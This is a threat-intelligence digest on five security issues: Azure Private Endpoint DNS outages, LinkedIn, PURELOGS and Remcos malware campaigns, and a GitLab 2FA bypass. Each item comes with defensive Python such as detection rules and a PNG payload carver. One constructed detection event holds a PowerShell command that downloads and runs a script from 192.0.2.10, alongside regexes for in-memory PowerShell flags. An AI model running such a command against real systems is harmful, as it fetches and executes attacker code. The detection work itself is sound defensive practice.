Azure Private Endpoints Can Create Hidden Denial-of-Service Risk
Palo Alto researchers have identified a design weakness in Azure Private Endpoint deployments that can unintentionally expose cloud resources to denial-of-service conditions. The issue stems from how Azure prioritizes Private DNS zones when a Private Endpoint is created, forcing name resolution through private DNS even for networks that still rely on public access. When multiple virtual networks share or inherit these Private DNS zones, workloads that previously accessed resources through public endpoints can suddenly lose connectivity. This behavior can disrupt access to critical services without changing the affected application itself. The impact is amplified in hybrid or complex network environments where different teams or vendors manage connectivity independently. Analysis suggests a meaningful portion of Azure environments contain at least one configuration where this failure mode is possible. The risk can emerge accidentally through routine security hardening or vendor deployments, but it can also be abused intentionally by attackers with access to Azure configuration controls. By deploying a Private Endpoint in a targeted way, an attacker could disrupt access to storage accounts, Key Vaults, Functions, container registries, or databases, causing cascading application failures. In many environments, loss of access to storage or secrets alone is enough to halt deployments and production workloads. Microsoft acknowledges this as a known architectural limitation, and existing workarounds either weaken the Private Endpoint security model or introduce operational complexity. Organizations should proactively inventory Private DNS zone links, identify networks that resolve private names without corresponding endpoints, and assess which resources still rely on public access. 
Security and cloud teams should implement continuous configuration reviews, restrict who can create Private Endpoints, monitor DNS resolution failures, and treat Private Link changes as high-risk actions requiring formal change control.
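One way to carry out that inventory, written here as an added example rather than anything from the Palo Alto write-up: the Python below cross-references a Private DNS zone's A records and virtual network links against the private endpoints that actually serve each record, and lists every linked VNet that will resolve a privatelink name to an address it cannot reach. The data structures are constructed to resemble what the Azure CLI returns; zone names, VNet names and IPs are invented, and peering is modelled only as direct links.

```python
"""Cross-check Azure Private DNS zone links against the private endpoints that
actually serve each record, and list every VNet that will resolve a privatelink
name to a private IP it cannot reach. Field names and values below are
constructed to resemble `az` CLI output; they are not data from the report."""
from collections import defaultdict

# Constructed: A records per Private DNS zone (record label -> endpoint private IP).
ZONE_RECORDS = {
    "privatelink.blob.core.windows.net": {
        "stacct01": "10.1.2.4",   # live storage account endpoint
        "stdecom": "10.1.2.9",    # stale record: its endpoint was deleted
    },
    "privatelink.vaultcore.azure.net": {"kvprod": "10.1.2.5"},
}

# Constructed: virtual network links on each zone.
ZONE_LINKS = {
    "privatelink.blob.core.windows.net": ["vnet-hub", "vnet-app", "vnet-vendor"],
    "privatelink.vaultcore.azure.net": ["vnet-hub", "vnet-app"],
}

# Constructed: private endpoints, with the VNet hosting their NIC and the record they serve.
PRIVATE_ENDPOINTS = [
    {"name": "pe-stacct01-blob", "vnet": "vnet-hub",
     "zone": "privatelink.blob.core.windows.net", "record": "stacct01"},
    {"name": "pe-kvprod", "vnet": "vnet-app",
     "zone": "privatelink.vaultcore.azure.net", "record": "kvprod"},
]

# Constructed: VNet peerings, treated as undirected.
PEERINGS = [("vnet-hub", "vnet-app")]


def reachable_vnets(vnet, peerings):
    """VNets that can route to `vnet`: itself plus its direct peers.
    Assumption: only direct peering is modelled, not transit through a hub."""
    reach = {vnet}
    for a, b in peerings:
        if a == vnet:
            reach.add(b)
        elif b == vnet:
            reach.add(a)
    return reach


def find_unreachable_resolutions(zone_records, zone_links, endpoints, peerings):
    """Return sorted (vnet, fqdn, private_ip) triples where a linked VNet will
    resolve `fqdn` to `private_ip` but hosts no endpoint for that record and is
    not peered to a VNet that does. Workloads there that previously used the
    public endpoint start failing as soon as the zone link exists."""
    served_from = defaultdict(set)          # (zone, record) -> VNets that can reach its PE
    for pe in endpoints:
        served_from[(pe["zone"], pe["record"])] |= reachable_vnets(pe["vnet"], peerings)

    findings = []
    for zone, records in zone_records.items():
        for vnet in zone_links.get(zone, []):
            for label, ip in records.items():
                if vnet not in served_from[(zone, label)]:
                    findings.append((vnet, f"{label}.{zone}", ip))
    return sorted(findings)


if __name__ == "__main__":
    for vnet, fqdn, ip in find_unreachable_resolutions(
            ZONE_RECORDS, ZONE_LINKS, PRIVATE_ENDPOINTS, PEERINGS):
        print(f"{vnet}: resolves {fqdn} -> {ip} with no reachable private endpoint")
```

In a real run, populate the three tables from `az network private-dns record-set a list`, `az network private-dns link vnet list` and `az network private-endpoint list` output. The finding for vnet-vendor is the failure mode the article describes (a network linked to the zone by someone else's deployment), and the stale stdecom record shows the same outage hitting every linked network at once.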
LinkedIn Phishing Campaign Delivers Stealth Remote Access Malware
ReliaQuest researchers have identified a sophisticated phishing campaign abusing LinkedIn private messages to deliver remote access trojans and gain long-term control of corporate systems. Attackers pose as business contacts and send links to malicious archives disguised as legitimate project documents or product materials, tailored to the recipient’s role to increase credibility. The downloaded archive contains a mix of legitimate and malicious components, including a real PDF reader, a hidden malicious DLL, a portable Python interpreter, and decoy files to reduce suspicion. When the victim opens the file, the trusted PDF reader unintentionally loads the malicious DLL, allowing attacker code to execute within a legitimate process and bypass many endpoint defenses. The malware then establishes persistence by creating a registry run key that ensures it launches every time the user logs in. From there, a weaponized Python script runs entirely in memory, decrypting and launching a remote access trojan without leaving clear traces on disk. This campaign is effective because it exploits blind spots in traditional security models and blends malicious activity with trusted tools and platforms. LinkedIn messages often bypass the inspection and controls applied to corporate email, giving attackers a direct path to high-value targets. By relying on legitimate open-source Python scripts and widely trusted software, the attackers reduce development effort while evading signature-based detection and complicating attribution. LinkedIn's professional context also enables precise targeting of executives, IT staff, and administrators who are more likely to have elevated access. To reduce risk, organizations should treat files received through social media platforms with the same caution as email attachments and reinforce user training around executable archives and unexpected downloads. 
Security teams should restrict the use of unauthorized Python interpreters, monitor for unusual in-memory script execution, and apply application controls to limit DLL sideloading and the use of untrusted portable tools.
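Two of the behaviours described above, the trusted PDF reader loading an unsigned DLL from its own download folder and the Run key that relaunches the portable interpreter at logon, can be caught from endpoint telemetry. The Python below is an added example, not ReliaQuest's tooling: it runs two rules over records shaped like Sysmon Event ID 7 (ImageLoad) and Event ID 13 (RegistryEvent SetValue). The field names are Sysmon's; the file names, paths and SID are constructed, and the notion of "user-writable" is an assumption limited to a few profile folders.

```python
"""Two detection rules for the LinkedIn campaign's host-side behaviour:
 (1) a program running from a user-writable folder loads an unsigned DLL from
     that same folder (DLL sideloading beside a legitimate executable), and
 (2) a Run/RunOnce value is set to a command in a user-writable folder.
Events are constructed in the shape of Sysmon Event ID 7 and Event ID 13;
names, paths and the SID are sample values, not indicators from the report."""
import ntpath
import re

# Assumption: these profile folders are where dropped archives and tools usually land.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(downloads|desktop|documents|appdata)\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.IGNORECASE)

EVENTS = [
    # Constructed: the reader loading a system DLL from System32 (benign).
    {"EventID": 7, "Image": r"C:\Users\alice\Downloads\ProjectDocs\reader.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    # Constructed: the same reader loading an unsigned DLL from its own folder.
    {"EventID": 7, "Image": r"C:\Users\alice\Downloads\ProjectDocs\reader.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\ProjectDocs\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    # Constructed: a Run value pointing at a portable interpreter under AppData.
    {"EventID": 13, "Image": r"C:\Users\alice\Downloads\ProjectDocs\reader.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\alice\AppData\Roaming\pyrt\python.exe C:\Users\alice\AppData\Roaming\pyrt\u.py"},
    # Constructed: an installer registering an agent under Program Files (benign by this rule).
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
]


def is_sideload(ev):
    """Event 7: loader lives in a user-writable folder and pulls an unsigned DLL
    from that same folder, the search-order position a sideload relies on."""
    if ev.get("EventID") != 7:
        return False
    exe_dir = ntpath.dirname(ev["Image"]).lower()
    dll_dir = ntpath.dirname(ev["ImageLoaded"]).lower()
    return (bool(USER_WRITABLE.match(ev["Image"]))
            and exe_dir == dll_dir
            and ev.get("Signed", "").lower() != "true")


def is_user_path_runkey(ev):
    """Event 13: a Run/RunOnce value whose command points into a user-writable folder."""
    if ev.get("EventID") != 13:
        return False
    return bool(RUN_KEY.search(ev["TargetObject"])) and bool(USER_WRITABLE.match(ev["Details"]))


def triage(events):
    """Return (rule_name, event) pairs in event order for the analyst queue."""
    hits = []
    for ev in events:
        if is_sideload(ev):
            hits.append(("dll_sideload_user_dir", ev))
        if is_user_path_runkey(ev):
            hits.append(("runkey_user_path", ev))
    return hits


if __name__ == "__main__":
    for rule, ev in triage(EVENTS):
        print(rule, ev.get("ImageLoaded") or ev.get("Details"))
```

The sideload rule deliberately keys on the directory relationship rather than on a DLL name list, since the DLL a campaign chooses changes far more often than the pattern of a signed binary pulling an unsigned library from a download folder. Expect some noise from legitimate portable applications, which is why the Run-key rule is a useful second signal on the same host.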
PURELOGS Campaign Abuses Image Files for Stealth Credential Theft
Swiss Post Cybersecurity researchers identified a PURELOGS infostealer campaign that is designed to look routine at every step, making it easier to slip past both users and basic security controls. The attack starts with a phishing email posing as a pharmaceutical invoice, containing a ZIP file with a Windows script (.js) that runs on the endpoint, not in the browser. Once a user opens it, the script quietly launches PowerShell in the background and runs the next stage directly in memory, reducing the telltale files that defenders typically look for. The campaign relies on a multi-step chain in which each component appears common on its own, helping it blend into normal activity. The operator then pulls additional content from a trusted public site, reducing the chance that network monitoring flags the download as suspicious. Overall, this is a “low-noise” delivery approach intended to keep the victim unaware while the attacker sets up the theft phase. The standout technique is that the malware payload is hidden inside what appears to be a standard PNG image, allowing the attacker to move malicious code under the cover of a harmless-looking file type. The image displays normally, but it contains hidden, encoded content appended after the visible image data, and the script knows exactly how to extract it using markers embedded in the file. Instead of saving the extracted content to disk, the attack loads it straight into memory and then launches a loader that checks whether it is running in a security sandbox and stops if it detects analysis. Next, the loader injects the final malware into a legitimate Microsoft process, making the activity appear more trustworthy during quick triage and reducing the likelihood of simple alerting. 
Once running, PURELOGS focuses on credential and session theft from Chromium-based browsers, pulling saved passwords, cookies, autofill data, and stored payment details, then expands to data from email clients, FTP tools, messaging apps, and a wide set of cryptocurrency wallets and wallet extensions. The malware is offered commercially as a subscription service, which increases operational risk by lowering the barrier for many different threat actors to use the same tooling. Organizations should reinforce user reporting and filtering for invoice-themed phishing, restrict or closely control Windows Script Host and unmanaged PowerShell use, monitor endpoints for unusual script-driven behavior and legitimate processes acting abnormally, and treat “trusted” hosting platforms as potential delivery channels rather than a safety guarantee.
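The "content appended after the visible image data" trick works because image viewers stop reading a PNG at its IEND chunk and ignore whatever follows. A triage script can use the same chunk structure the other way round: walk the chunks to IEND, measure what trails it, and pull out anything bracketed by marker strings. The Python below is an added example, not Swiss Post's analysis tooling; it builds its own one-pixel PNG and appends a constructed blob between invented markers, so the marker strings and payload are not those of the real campaign.

```python
"""Detect and carve data appended after a PNG's IEND chunk, the hiding spot the
PURELOGS loader uses. Added example; the sample image, marker strings and
payload below are constructed, not taken from the campaign."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunks(data):
    """Yield (type, offset, length) per chunk, validating each CRC.
    Stops after IEND; raises ValueError on a malformed or truncated file."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError(f"chunk {ctype!r} at {pos} runs past end of file")
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk at {pos}")
        yield ctype, pos, length
        pos += 12 + length
        if ctype == b"IEND":
            return
    raise ValueError("truncated PNG (no IEND)")


def trailing_data(data):
    """Return everything after the IEND chunk (empty for a clean file)."""
    end = 0
    for ctype, pos, length in png_chunks(data):
        end = pos + 12 + length
    return data[end:]


def extract_between(blob, start_marker, end_marker):
    """Return the bytes between two marker strings, or None if either is absent.
    Used here to confirm what a suspicious image actually carries."""
    s = blob.find(start_marker)
    if s < 0:
        return None
    e = blob.find(end_marker, s + len(start_marker))
    if e < 0:
        return None
    return blob[s + len(start_marker):e]


def build_chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def minimal_png():
    """Construct a valid 1x1 RGB PNG for the demo (not a real sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, truecolour
    idat = zlib.compress(b"\x00\xff\x00\x00")              # filter byte + one red pixel
    return PNG_SIG + build_chunk(b"IHDR", ihdr) + build_chunk(b"IDAT", idat) + build_chunk(b"IEND", b"")


CLEAN = minimal_png()
# Constructed: the same image with a marked blob appended after IEND; viewers still render it.
START, END = b"<<BASE64_START>>", b"<<BASE64_END>>"
TAMPERED = CLEAN + START + b"aGVsbG8=" + END


def report(data):
    """Summarise a file for triage: chunk list, bytes after IEND, any marked payload."""
    chunks = [c.decode() for c, _, _ in png_chunks(data)]
    tail = trailing_data(data)
    return {"chunks": chunks, "trailing_bytes": len(tail),
            "payload": extract_between(tail, START, END)}


if __name__ == "__main__":
    print(report(CLEAN))
    print(report(TAMPERED))
```

A non-zero trailing_bytes value on an image arriving through a script-driven download is the cheap signal to alert on; the marker-based carve is only meaningful once an analyst knows which markers a given loader looks for, so in practice you would parameterise START and END from the script that referenced the image.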
Weaponized Shipping Documents Deliver Fileless Remcos RAT
FortiGuard Labs has identified a stealthy phishing campaign that spreads a fileless version of Remcos RAT by abusing shipping-themed documents to lure victims. The attack begins with emails impersonating Vietnamese shipping companies that encourage recipients to open a Microsoft Word attachment that appears to contain updated logistics or delivery information. When opened, the document silently pulls in a remote template from attacker-controlled infrastructure, using multiple redirection services to obscure the final destination. This automatic behavior triggers a long-known Microsoft Office vulnerability that allows code to run without user interaction, demonstrating how outdated systems remain a reliable entry point for attackers. The infection chain is carefully designed so that each step appears routine, helping the campaign avoid suspicion in organizations that regularly handle shipping or logistics documents. Despite the age of the vulnerability, the campaign shows it remains effective where patching discipline is inconsistent. Once exploitation occurs, the attack progresses through several lightweight stages that never write the final malware to disk. A script downloader launches PowerShell in the background, which then retrieves a malicious module disguised as a legitimate system component, hidden inside an image file. This module creates persistence using scheduled tasks and then injects the Remcos remote access tool directly into memory, disguising it inside a legitimate Windows process. From there, attackers gain long-term control, enabling surveillance, credential theft, file access, and network manipulation without leaving obvious artifacts behind. The compromised system is repeatedly reactivated to ensure continued access, even if the process is interrupted. 
Organizations should strengthen email filtering for shipping-themed lures, disable automatic remote template loading in Office, prioritize patching long-standing vulnerabilities, and monitor for abnormal scheduled task creation and memory-only malware behavior to reduce exposure to similar attacks.
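The Remcos chain above and the PURELOGS chain in the previous item share a shape that process telemetry exposes well: a script host or an Office application spawning PowerShell, PowerShell started with flags that keep the next stage in memory, and a scheduled task whose action is a script interpreter or a program in a user directory. The Python below is an added example rather than anything from FortiGuard Labs or Swiss Post; it runs those rules over records constructed in the shape of Sysmon Event ID 1 (ProcessCreate) and Security Event 4698 (scheduled task created). The command lines, task names, paths and the 192.0.2.10 address are sample values, not indicators from either report.

```python
"""Process-chain and scheduled-task rules for the delivery pattern shared by the
PURELOGS and Remcos campaigns. Events are constructed in the shape of Sysmon
Event ID 1 and Security Event 4698; command lines, paths and the 192.0.2.10
address are sample values, not indicators from the reports."""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
LOLBINS = SHELLS | {"cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
INTERPRETERS = SHELLS | SCRIPT_HOSTS | {"mshta.exe"}
# Assumption: these switches and cmdlets are the usual signs of a stage kept off disk.
IN_MEMORY_FLAGS = re.compile(
    r"-(enc|encodedcommand|e)\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression"
    r"|downloadstring|frombase64string", re.IGNORECASE)
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)
TASK_COMMAND = re.compile(r"<Command>(.*?)</Command>", re.IGNORECASE | re.DOTALL)

EVENTS = [
    # Constructed: JScript downloader handing off to hidden, encoded PowerShell.
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgA"},
    # Constructed: Word spawning PowerShell that fetches and runs a script in memory.
    {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -w hidden -c "
                    "\"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/m.ps1')\""},
    # Constructed: a user opening a document from Explorer (benign).
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "\"WINWORD.EXE\" /n \"C:\\Users\\bob\\Downloads\\shipping.docx\""},
    # Constructed: persistence task whose action is PowerShell with the same flags.
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Updater",
     "TaskContent": "<Task><Actions><Exec><Command>powershell.exe</Command>"
                    "<Arguments>-w hidden -enc SQBFAFgA</Arguments></Exec></Actions></Task>"},
    # Constructed: a vendor backup task under Program Files (benign by these rules).
    {"EventID": 4698, "TaskName": r"\Vendor\NightlyBackup",
     "TaskContent": "<Task><Actions><Exec><Command>C:\\Program Files\\Vendor\\backup.exe"
                    "</Command></Exec></Actions></Task>"},
]


def base(path):
    return ntpath.basename(path).lower()


def rules_for(ev):
    """Return the rule names one event triggers (empty list = benign under these rules)."""
    hits = []
    if ev.get("EventID") == 1:
        parent, child = base(ev["ParentImage"]), base(ev["Image"])
        if parent in SCRIPT_HOSTS and child in LOLBINS:
            hits.append("script_host_spawns_lolbin")
        if parent in OFFICE_APPS and child in LOLBINS:
            hits.append("office_spawns_lolbin")
        if child in SHELLS and IN_MEMORY_FLAGS.search(ev.get("CommandLine", "")):
            hits.append("powershell_inmemory_flags")
    elif ev.get("EventID") == 4698:
        m = TASK_COMMAND.search(ev.get("TaskContent", ""))
        command = m.group(1).strip() if m else ""
        if command and (base(command) in INTERPRETERS or USER_WRITABLE.match(command)):
            hits.append("scheduled_task_interpreter_or_user_path")
    return hits


def triage(events):
    """Return (rule, event_index) pairs in event order for the analyst queue."""
    return [(rule, i) for i, ev in enumerate(events) for rule in rules_for(ev)]


if __name__ == "__main__":
    for rule, i in triage(EVENTS):
        print(f"event {i}: {rule}")
```

The parent-child rules are the durable part: the lure theme, the redirector chain and the image carrier all change between campaigns, but a document or a .js file still has to get a shell running. The task rule complements the Run-key check from the LinkedIn item, since this campaign chooses scheduled tasks for the same persistence goal.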
GitLab Releases Security Fix for Self-Managed 2FA Bypass
GitLab released security fixes for a high-severity flaw that could let an attacker bypass two-factor authentication if they already know a target account’s credential ID. The issue, tracked as CVE-2026-0723, stems from a logic weakness in the authentication flow that can accept forged device responses under certain conditions. In practice, this increases account takeover risk in self-managed GitLab environments, especially when account IDs or related identifiers are exposed through logs, integrations, or user enumeration. GitLab also patched additional high-severity issues that could allow unauthenticated denial-of-service through malformed authentication requests and API authorization validation gaps, plus medium-severity DoS conditions tied to malformed Wiki content and repeated malformed SSH authentication attempts. The concern is amplified by the large number of internet-exposed GitLab instances, which creates a broad target set for opportunistic scanning and exploitation attempts. For most organizations, the business impact centers on identity control and the integrity of the developer pipeline. If GitLab access controls are weakened, attackers can disrupt software delivery, access source code, tamper with projects, and pivot into connected systems. GitLab has shipped patched versions 18.8.2, 18.7.2, and 18.6.4 for CE and EE, and GitLab.com is already patched, so the urgent focus is self-managed deployments. Prioritize upgrades immediately, then review external exposure and restrict unnecessary internet access to GitLab, especially administrative and authentication endpoints. Rotate high-risk credentials and access tokens after patching, and validate that 2FA enforcement and device trust workflows behave as expected. Add monitoring for abnormal login patterns and spikes in failed authentication attempts or malformed requests to catch early probing attempts. 
If you run GitLab on the internet, treat this as an emergency maintenance item and close the window for bypass and disruption as fast as operationally possible.
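For the "spikes in failed authentication attempts" monitoring the advisory summary asks for, the Python below is an added example, not GitLab tooling: a sliding-window count of failed sign-in POSTs per source address over request-log lines. The log lines are constructed in a simplified JSON shape (time, remote_ip, method, path, status); the sign-in path, the statuses treated as failures, the five-minute window and the threshold of ten are all assumptions to adapt to how your instance actually logs authentication.

```python
"""Spot sources producing bursts of failed sign-in attempts in GitLab request
logs, the early-probing signal worth alerting on while patching is under way.
Added example; the log lines are constructed in a simplified JSON shape, and
the path prefix, failure statuses, window and threshold are assumptions."""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
THRESHOLD = 10
AUTH_PATH_PREFIX = "/users/sign_in"      # assumption: password and 2FA submissions post here
FAILURE_STATUSES = {401, 403, 422}       # assumption: how this instance reports a rejected attempt


def build_sample_log():
    """Construct log lines: one source hammering sign-in, one quiet source, one success."""
    t0 = datetime(2026, 2, 1, 9, 0, 0)
    recs = []
    for i in range(12):                           # twelve failures in two minutes
        recs.append({"time": (t0 + timedelta(seconds=10 * i)).isoformat(),
                     "remote_ip": "198.51.100.7", "method": "POST",
                     "path": "/users/sign_in", "status": 422})
    for i in range(2):                            # two failures ten minutes apart
        recs.append({"time": (t0 + timedelta(minutes=10 * i)).isoformat(),
                     "remote_ip": "203.0.113.5", "method": "POST",
                     "path": "/users/sign_in", "status": 422})
    recs.append({"time": (t0 + timedelta(minutes=21)).isoformat(),
                 "remote_ip": "203.0.113.5", "method": "POST",
                 "path": "/users/sign_in", "status": 302})   # successful login redirect
    recs.append({"time": (t0 + timedelta(minutes=1)).isoformat(),
                 "remote_ip": "198.51.100.7", "method": "GET",
                 "path": "/users/sign_in", "status": 200})   # just loading the form
    return [json.dumps(r) for r in recs]


def is_failed_auth(rec):
    return (rec.get("method") == "POST"
            and str(rec.get("path", "")).startswith(AUTH_PATH_PREFIX)
            and rec.get("status") in FAILURE_STATUSES)


def detect_bursts(lines, window=WINDOW, threshold=THRESHOLD):
    """Sliding-window count of failed auth POSTs per source IP. Returns one alert
    per IP, raised the first time `threshold` failures land inside `window`."""
    events = []
    for line in lines:
        rec = json.loads(line)
        if is_failed_auth(rec):
            events.append((datetime.fromisoformat(rec["time"]), rec["remote_ip"]))
    events.sort()                                 # log order is not guaranteed
    recent = defaultdict(deque)
    alerts = {}
    for ts, ip in events:
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:                 # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {"first_failure": q[0].isoformat(),
                          "crossed_at": ts.isoformat(), "count": len(q)}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bursts(build_sample_log()).items():
        print(f"{ip}: {info['count']} failures by {info['crossed_at']}")
```

Alerting on the first window crossing rather than on every subsequent failure keeps one probing source to one ticket. Because the bypass described here needs a known credential ID rather than a guessed password, pair this with a per-account view of the same failures, so that repeated attempts against a single user from many addresses are not hidden by a per-IP threshold.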